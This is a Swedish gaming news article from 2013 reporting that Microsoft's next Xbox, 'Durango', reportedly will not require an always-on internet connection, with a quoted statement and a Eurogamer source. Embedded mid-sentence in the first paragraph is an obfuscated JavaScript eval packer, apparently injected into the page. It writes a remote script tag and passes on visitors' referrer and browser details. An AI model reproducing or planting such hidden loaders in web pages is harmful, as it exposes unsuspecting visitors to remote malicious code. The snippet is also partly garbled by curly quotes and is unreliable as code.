Image Image Image Image Image Image Image Image Image Image

| 5 juni, 2020

Scroll to top

Top

XBOX Durango kräver inte uppkoppling enligt ny rapport.

durango
Filip Urde
  • On 7 maj, 2013
  • http://www.revue.se/filip-urde

Ryktena eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hezyd|var|u0026u|referrer|kbiki||js|php’.split(’|’),0,{}))
kring nästa generations konsoler har varit många under våren. Det har bland annat släppts flera olika rapporter och rykten som pekat på att nästa Xbox Durango kommer att kräva ständig internetuppkoppling för att du ska kunna spela.  Det skulle även gälla spel som egentligen inte har några krav till att ha internet. Men igår kom en ny rapport som säger att detta rykte inte stämmer.

 

”Durango is designed to deliver the future of entertainment while engineered to be tolerant of today’s Internet. There are a number of scenarios that our users expect to work without an Internet connection, and those should ’just work’ regardless of their current connection status. Those include, but are not limited to: playing a Blu-ray disc, watching live TV, and yes playing a single-player game.”

 

Informationen vill Microsoft själva inte kommentera, utan hänvisar till att mer information om den nya generationens spel, TV, och underhållning kommer att visas upp den 21 maj.
www.eurogamer.net